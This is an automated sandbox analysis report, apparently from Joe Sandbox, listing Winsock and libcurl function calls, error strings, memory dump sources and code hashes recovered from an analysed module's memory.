• connect.WS2_32(00000000,?,00000010), ref: 6B7A6E36
• accept.WS2_32(00000000,00000000,00000000), ref: 6B7A6E4A
• curl_msnprintf.LIBCURL(?,0000000C,6B7E0CA0,6B771172), ref: 6B7A6E68
• send.WS2_32(6B771172,?,?,00000000), ref: 6B7A6E88
• recv.WS2_32(C74C79C0,00000001,0000000C,00000000), ref: 6B7A6E9D
• closesocket.WS2_32(00000000), ref: 6B7A6EF6
• closesocket.WS2_32(00000000), ref: 6B7A6F16
• closesocket.WS2_32(6B771172), ref: 6B7A6F1A
• closesocket.WS2_32(C74C79C0), ref: 6B7A6F1F

Memory Dump Source
• Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
• Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b770000_ast.jbxd

Similarity
• API ID: closesocket$socket$acceptbindconnectcurl_msnprintfgetsocknamehtonllistenrecvsendsetsockopt
• String ID:
• API String ID: 4135244658-0
• Opcode ID: 1a60fc938942f649a2f120fe06661343110e42da25748655be1865dc8299818c
• Instruction ID: f73a00944b0003e2d1f63e2ab8d13696e8e276e0718e7f30d42ccfccf7b7f448
• Opcode Fuzzy Hash: 1a60fc938942f649a2f120fe06661343110e42da25748655be1865dc8299818c
• Instruction Fuzzy Hash: BD51E432904108ABDB10DF7CCD85BADBB75AF06730F1043A5F975AA1D0E774EA468B60

Control-flow Graph (entry block 6b79fef0; rendered graph and edge list not preserved)
APIs
• WSASetLastError.WS2_32(00002726), ref: 6B79FF52
• WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B7A0105
• WSASetLastError.WS2_32(00002726,00000000,00000001,000000FF), ref: 6B7A012E
• Sleep.KERNEL32(FFFFFFFE,00000000,00000001,000000FF), ref: 6B7A0157
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7A01AA
• select.WS2_32(?,?,?,?,?), ref: 6B7A0271
• __WSAFDIsSet.WS2_32(?,?), ref: 6B7A02A9
• __WSAFDIsSet.WS2_32(?,?), ref: 6B7A02E9
• __WSAFDIsSet.WS2_32(?,?), ref: 6B7A0306
• Sleep.KERNEL32(FFFFFFFE), ref: 6B7A037E

Memory Dump Source
• Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
• Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6b770000_ast.jbxd

Similarity
• API ID: ErrorLast$Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@select
• String ID:
• API String ID: 1691268743-0
• Opcode ID: e67708df3558e330293bbaf40da53f1ceb03cae9229949d697f2dcceb63fac2e
• Instruction ID: 7dbaad22186d4256b56df1b4148969dee16d102de11b2d3df5d6cf3f4713e612
• Opcode Fuzzy Hash: e67708df3558e330293bbaf40da53f1ceb03cae9229949d697f2dcceb63fac2e
• Instruction Fuzzy Hash: 6DD18470A002198BEB658F29CA947EE77B5EF48710F104AFDF869D7290D778DA808F45

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: bbb938bfea4aa102978a11d1e4c3043f8231df891a1e13ffca661760acd3119d
                                                                                                                                            • Instruction ID: 4114ba975a743fbb8a82d8621786003d5e3fd3a2feb195716e47c75e1440cf0c
                                                                                                                                            • Opcode Fuzzy Hash: bbb938bfea4aa102978a11d1e4c3043f8231df891a1e13ffca661760acd3119d
                                                                                                                                            • Instruction Fuzzy Hash: 58026E75E002199FEB00DFA8E981BAEB7B5FF48310F104179F965EB295E738E9018B50

                                                                                                                                            Strings
                                                                                                                                            • Failed to connect to %s port %ld: %s, xrefs: 6B77327D
                                                                                                                                            • After %I64dms connect time, move on!, xrefs: 6B772F3C
                                                                                                                                            • Connection time-out, xrefs: 6B7732C4
                                                                                                                                            • connect to %s port %ld failed: %s, xrefs: 6B773070
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: After %I64dms connect time, move on!$Connection time-out$Failed to connect to %s port %ld: %s$connect to %s port %ld failed: %s
                                                                                                                                            • API String ID: 0-184998888
                                                                                                                                            • Opcode ID: 19eaa514da4c2d22f8a193677742f4b08b54691691142feb77b3cbbf02c7555d
                                                                                                                                            • Instruction ID: e0af3ae67b5f2359abee484de4ec0b20c18b728117876101f2f43b97fa924d26
                                                                                                                                            • Opcode Fuzzy Hash: 19eaa514da4c2d22f8a193677742f4b08b54691691142feb77b3cbbf02c7555d
                                                                                                                                            • Instruction Fuzzy Hash: CDF1E170A006049FDB31AF389E45BEEB3B5AF85319F0005F9F85D97251EB39AA81CB51

                                                                                                                                            APIs
                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 6B7A0B04
                                                                                                                                            • send.WS2_32(?,?,?,00000000), ref: 6B7A0B2B
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B7A0B3E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastrecvsend
                                                                                                                                            • String ID: Send failure: %s
                                                                                                                                            • API String ID: 3418755260-857917747
                                                                                                                                            • Opcode ID: aa31e7f342a4cc39035776ac852bb35fe18f67bf31783c973f3005eee8d8b31f
                                                                                                                                            • Instruction ID: c4d660a4ac9fb2ae76d2b65ea75a4b630ae0ff6e1735f20dd51fa3ba2d8642c9
                                                                                                                                            • Opcode Fuzzy Hash: aa31e7f342a4cc39035776ac852bb35fe18f67bf31783c973f3005eee8d8b31f
                                                                                                                                            • Instruction Fuzzy Hash: 0D519C71A002199FDB60CF28CE41BAAB7F5EF05324F1046A9F969D7290D778A991CF90

                                                                                                                                            APIs
                                                                                                                                            • socket.WS2_32(?,?,?), ref: 6B7741C1
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_mvsnprintf.LIBCURL(?,00000801,00000000,$lyk), ref: 6B7A06EF
                                                                                                                                              • Part of subcall function 6B7A06B0: curl_msnprintf.LIBCURL(?,00000004,...,?,?,?,00000E20), ref: 6B7A072F
                                                                                                                                            • setsockopt.WS2_32(00000000,00000006,00000001,?,00000004), ref: 6B7742C8
                                                                                                                                            • WSAGetLastError.WS2_32(?,00000100), ref: 6B7742DE
                                                                                                                                            • getsockopt.WS2_32(00000000,0000FFFF,00001001,00000000,00000004), ref: 6B774377
                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00001001,00004020,00000004), ref: 6B7743A3
                                                                                                                                            • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000000,00000004), ref: 6B7743DE
                                                                                                                                            • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000004,00000000,00000000), ref: 6B774461
                                                                                                                                            • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000007), ref: 6B77446B
                                                                                                                                              • Part of subcall function 6B79A660: ioctlsocket.WS2_32(00000000,8004667E,TEwk), ref: 6B79A67A
                                                                                                                                              • Part of subcall function 6B7AE5D0: QueryPerformanceCounter.KERNEL32(6B79F03B,?,6B77669E,6B79F03B,?,?,?,?), ref: 6B7AE5E5
                                                                                                                                              • Part of subcall function 6B7AE5D0: __alldvrm.LIBCMT ref: 6B7AE5FE
                                                                                                                                              • Part of subcall function 6B7AE5D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B7AE627
                                                                                                                                            • connect.WS2_32(00000000,?,?), ref: 6B7745D2
                                                                                                                                              • Part of subcall function 6B7969D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B796A0D
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B774604
                                                                                                                                            Strings
                                                                                                                                            • Trying %s:%ld..., xrefs: 6B774271
                                                                                                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 6B774235
                                                                                                                                            • @, xrefs: 6B77430C
                                                                                                                                            • Could not set TCP_NODELAY: %s, xrefs: 6B7742EB
                                                                                                                                            • Failed to set SO_KEEPALIVE on fd %d, xrefs: 6B7743E9
                                                                                                                                            • Immediate connect fail for %s: %s, xrefs: 6B77463A
                                                                                                                                            • Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 6B774473
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastsetsockopt$Unothrow_t@std@@@__ehfuncinfo$??2@$CounterIoctlPerformanceQuery__alldvrmconnectcurl_msnprintfcurl_mvsnprintfgetsockoptioctlsocketsocket
                                                                                                                                            • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                                                                                                                            • API String ID: 194311702-3868455274
                                                                                                                                            • Opcode ID: 51f49627f3a7f030609dab3e3330a57e9474e264c98a49239d770551d5b60576
                                                                                                                                            • Instruction ID: 1d32c93ba3fd901d978e0ec1e194c116d4807e0df63f846f7d693ae5886e37f1
                                                                                                                                            • Opcode Fuzzy Hash: 51f49627f3a7f030609dab3e3330a57e9474e264c98a49239d770551d5b60576
                                                                                                                                            • Instruction Fuzzy Hash: DEF18071940219AFEF20EF74DD89BAEB7B8EB05308F1001F6F519E6290D7799A809F51

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • getpeername.WS2_32(?,?,?), ref: 6B7736FE
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B773708
                                                                                                                                              • Part of subcall function 6B7AA0E0: GetLastError.KERNEL32(?,?,00000100), ref: 6B7AA0E7
                                                                                                                                              • Part of subcall function 6B7A05D0: curl_mvsnprintf.LIBCURL(?,00000100,6B79C830,?), ref: 6B7A0610
                                                                                                                                            • getsockname.WS2_32(?,?,00000080), ref: 6B773772
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77377C
                                                                                                                                            Strings
                                                                                                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 6B7738A0
                                                                                                                                            • getpeername() failed with errno %d: %s, xrefs: 6B773724
                                                                                                                                            • getsockname() failed with errno %d: %s, xrefs: 6B773798
                                                                                                                                            • ssrem inet_ntop() failed with errno %d: %s, xrefs: 6B773801
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$curl_mvsnprintfgetpeernamegetsockname
                                                                                                                                            • String ID: getpeername() failed with errno %d: %s$getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
                                                                                                                                            • API String ID: 673488319-670633250
                                                                                                                                            • Opcode ID: 484726761bfaf2850f9f7ae799309f59c71f6bae03a701454c7db971cca4aa46
                                                                                                                                            • Instruction ID: d69d74b4bb2394c2aa14fbb1f32f9da63042560f0b8aedafb35b39213af48cf2
                                                                                                                                            • Opcode Fuzzy Hash: 484726761bfaf2850f9f7ae799309f59c71f6bae03a701454c7db971cca4aa46
                                                                                                                                            • Instruction Fuzzy Hash: AD81C1759006089BDB21DF74C945BEBB3F8EF59304F1042AEF99DA7202EB357A858B50

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • curl_msnprintf.LIBCURL(?,0000000C,6B7DB330,?), ref: 6B7716FA
                                                                                                                                              • Part of subcall function 6B776E10: getaddrinfo.WS2_32(?,?,?,6B7DB330), ref: 6B776E2E
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771722
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771728
                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6B77173B
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B771749
                                                                                                                                            • send.WS2_32(?,?,00000001,00000000), ref: 6B771778
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B771782
                                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 6B771790
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalErrorLastSection$Leave$Entercurl_msnprintfgetaddrinfosend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1592919352-0
                                                                                                                                            • Opcode ID: b9b25630b9adbc20a46c67bcc76c9b5f389d6dedccdff59db25f894c86d72a27
                                                                                                                                            • Instruction ID: 60e58b39a775d20278000450350006252ad3269c78da8a4c3faa218b5b7de208
                                                                                                                                            • Opcode Fuzzy Hash: b9b25630b9adbc20a46c67bcc76c9b5f389d6dedccdff59db25f894c86d72a27
                                                                                                                                            • Instruction Fuzzy Hash: 5D218B71500209ABDB20AFB5CD85BABB7F8EF49340F004939F666C3640EB35E9058BA0

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • inet_pton.WS2_32(00000002,00000000,?), ref: 6B788590
                                                                                                                                            • inet_pton.WS2_32(00000017,00000000,?), ref: 6B7885C0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: inet_pton
                                                                                                                                            • String ID: )<wk$)<wk$)<wk$Hostname %s was found in DNS cache
                                                                                                                                            • API String ID: 1350483568-3188785951
                                                                                                                                            • Opcode ID: 5802dc0a60e4bfb12c8f3629bb4cdff6f000fbe448da169ad9b558ac7705f3bf
                                                                                                                                            • Instruction ID: fe4496fbc3cf08aae4e2c7c336a186e509df3ede9958d6d6a90c7e65c6e043ac
                                                                                                                                            • Opcode Fuzzy Hash: 5802dc0a60e4bfb12c8f3629bb4cdff6f000fbe448da169ad9b558ac7705f3bf
                                                                                                                                            • Instruction Fuzzy Hash: BD61C571E00209ABDB119FB4DE46BEFBBB8AF05358F0001B5F91576281E7395A15CBE1

                                                                                                                                            Control-flow Graph

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8e8067a78db3303a3bad7c691af0d7dd1dfa7efe4d97dbf7c1a2c5341c2d2b3a
                                                                                                                                            • Instruction ID: dca50cfa7984e519151a68481f87a307e994cd33ddfb9e3b5e57d1465f5b1de2
                                                                                                                                            • Opcode Fuzzy Hash: 8e8067a78db3303a3bad7c691af0d7dd1dfa7efe4d97dbf7c1a2c5341c2d2b3a
                                                                                                                                            • Instruction Fuzzy Hash: 6211CA72E021147BDF31A9759DC5BAF7BAC9F51A90F0401B5FD0C9B242E7688D4182E1

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • curl_multi_remove_handle.LIBCURL(?), ref: 6B781681
                                                                                                                                            • curl_multi_cleanup.LIBCURL(?), ref: 6B781691
                                                                                                                                            • curl_slist_free_all.LIBCURL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6B781904
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: curl_multi_cleanupcurl_multi_remove_handlecurl_slist_free_all
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3107128920-0
                                                                                                                                            • Opcode ID: e0f8d218cac8f83cc7a058a74f126eed3233b77534ecc88d2dc9665e4f2a5fef
                                                                                                                                            • Instruction ID: 1879423e99096fd621c8fd06a2e49f7cbcc7d2efd92f91b948f33dfe2bdeb9af
                                                                                                                                            • Opcode Fuzzy Hash: e0f8d218cac8f83cc7a058a74f126eed3233b77534ecc88d2dc9665e4f2a5fef
                                                                                                                                            • Instruction Fuzzy Hash: EA6112B8400B50EBDB215FB0E90D7CA7BE9BF05309F004869F5AE52650D7B9B054DF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,6B7C1F4E,6B7C8951,6B7C8465,?,00000000,?,?,?,?,?,?,?,CMyk), ref: 6B7CF697
                                                                                                                                            • _free.LIBCMT ref: 6B7CF6F4
                                                                                                                                            • _free.LIBCMT ref: 6B7CF72A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000015,000000FF,?,?,?,?,?,?,?,CMyk,6B7C8987,00000000,?,?,0000000A), ref: 6B7CF735
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: 6585cc774cb8936d96043a32cde4e65ba2921df9e5f65ccc89414cac07a23f4a
                                                                                                                                            • Instruction ID: 6612206b45e99415203eee1d28cea44b8ce9529af3ee2b15fcc27340bbb964c8
                                                                                                                                            • Opcode Fuzzy Hash: 6585cc774cb8936d96043a32cde4e65ba2921df9e5f65ccc89414cac07a23f4a
                                                                                                                                            • Instruction Fuzzy Hash: AA11A9322045016FDA055A789F9AE1F276D9BC67B8B20027DF5359F1D0EF2DCC0D4626

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 6B7714E0: EnterCriticalSection.KERNEL32(?,?,00000000,?,?,?,6B781C62,?,00000000), ref: 6B7715E0
                                                                                                                                              • Part of subcall function 6B7714E0: LeaveCriticalSection.KERNEL32(?,?,?,6B781C62,?,00000000), ref: 6B7715F3
                                                                                                                                              • Part of subcall function 6B7714E0: closesocket.WS2_32(000006FC), ref: 6B771642
                                                                                                                                            • curl_msnprintf.LIBCURL(?,00000100,Connection #%ld to host %s left intact,?,?), ref: 6B798690
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3365414711.000000006B771000.00000020.00000001.01000000.00000016.sdmp, Offset: 6B770000, based on PE: true
• Associated: 0000000A.00000002.3365377882.000000006B770000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366828331.000000006B7F1000.00000004.00000001.01000000.00000016.sdmp
• Associated: 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_6b770000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$EnterLeaveclosesocketcurl_msnprintf
                                                                                                                                            • String ID: %s$Connection #%ld to host %s left intact
                                                                                                                                            • API String ID: 283241466-118628944

                                                                                                                                            APIs
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B772B71
                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6B772BA0
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                            • String ID: Connection time-out
                                                                                                                                            • API String ID: 885266447-165637984
                                                                                                                                            APIs
                                                                                                                                            • recv.WS2_32(00000008,?,?,00000000), ref: 6B7A07EE
                                                                                                                                            • WSAGetLastError.WS2_32(?,6B7A737C,?,?,00000008,?), ref: 6B7A07FB
                                                                                                                                            Strings
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastrecv
                                                                                                                                            • String ID: |szk
                                                                                                                                            • API String ID: 2514157807-1504329629
                                                                                                                                            APIs
                                                                                                                                            • getaddrinfo.WS2_32(?,?,?,6B7DB330), ref: 6B776E2E
                                                                                                                                            • freeaddrinfo.WS2_32(6B7DB330,?,?,6B7DB330,?), ref: 6B776F4C
                                                                                                                                            • WSASetLastError.WS2_32(00002AF9,?,?,6B7DB330,?), ref: 6B776F99
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastfreeaddrinfogetaddrinfo
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1817844550-0
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(6B7716D0,6B771218,6B7C8204,00000000,00000000,6B7716D0), ref: 6B7C83A9
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,6B779136,00000000,00000000,6B7716D0,6B771218,00000000,00000000), ref: 6B7C83B5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 6B7C83BC
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744730728-0
                                                                                                                                            APIs
                                                                                                                                            • SleepEx.KERNEL32(00000000,00000000), ref: 6B774758
                                                                                                                                            • getsockopt.WS2_32(00000004,0000FFFF,00001007,00000000,00000004), ref: 6B774773
                                                                                                                                            • WSAGetLastError.WS2_32 ref: 6B77477D
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLastSleepgetsockopt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3033474312-0
                                                                                                                                            APIs
                                                                                                                                            • InitializeCriticalSectionEx.KERNEL32(00000000,00000000,00000001,?,?,00000000,00000048), ref: 6B77115D
                                                                                                                                            Strings
                                                                                                                                            • getaddrinfo() thread failed to start, xrefs: 6B7711AA
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalInitializeSection
                                                                                                                                            • String ID: getaddrinfo() thread failed to start
                                                                                                                                            • API String ID: 32694325-737161664
                                                                                                                                            • Opcode ID: e26e4d85ed6f4e6f1ad92fb3eae95a188af1c9247c30340d6fa3f0a894c66c6d
